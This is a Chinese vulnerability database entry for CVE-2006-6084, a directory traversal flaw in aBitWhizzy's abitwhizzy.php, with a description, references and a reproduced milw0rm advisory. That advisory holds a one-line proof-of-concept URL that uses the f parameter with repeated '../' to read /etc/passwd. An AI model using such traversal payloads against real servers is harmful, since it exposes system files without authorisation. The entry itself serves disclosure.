aBitWhizzy abitwhizzy.php远程目录遍历信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111630 漏洞类型 路径遍历
发布时间 2006-11-21 更新时间 2006-11-28
CVE编号 CVE-2006-6084 CNNVD-ID CNNVD-200611-403
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2823
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-403
|漏洞详情
aBitWhizzy是一种基于Web的论坛软件。aBitWhizzy实现上存在输入验证漏洞,远程攻击者可能利用此漏洞非授权获取文件内容。aBitWhizzy的abitwhizzy.php脚本没有正确地过滤对f参数的输入,允许攻击者通过目录遍历攻击泄漏任意文件的内容。
|漏洞EXP
aBitWhizzy [local file include]
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy 
bug:local file include
global risk : high


http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-21]
|参考资料

来源:XF
名称:abitwhizzy-abitwhizzy-file-include(30458)
链接:http://xforce.iss.net/xforce/xfdb/30458
来源:BID
名称:21222
链接:http://www.securityfocus.com/bid/21222
来源:BUGTRAQ
名称:20061121aBitWhizzy[localfileinclude]
链接:http://www.securityfocus.com/archive/1/archive/1/452235/100/0/threaded
来源:VUPEN
名称:ADV-2006-4657
链接:http://www.frsirt.com/english/advisories/2006/4657
来源:SECTRACK
名称:1017266
链接:http://securitytracker.com/id?1017266
来源:SECUNIA
名称:23055
链接:http://secunia.com/advisories/23055
来源:MISC
链接:http://s-a-p.ca/index.php?page=OurAdvisories&id=52
来源:www.unverse.net
链接:http://www.unverse.net/abitwhizzy-forum/0611251408/
来源:BUGTRAQ
名称:20061204Re:aBitWhizzy[localfileinclude]
链接:http://www.securityfocus.com/archive/1/archive/1/453478/100/0/threaded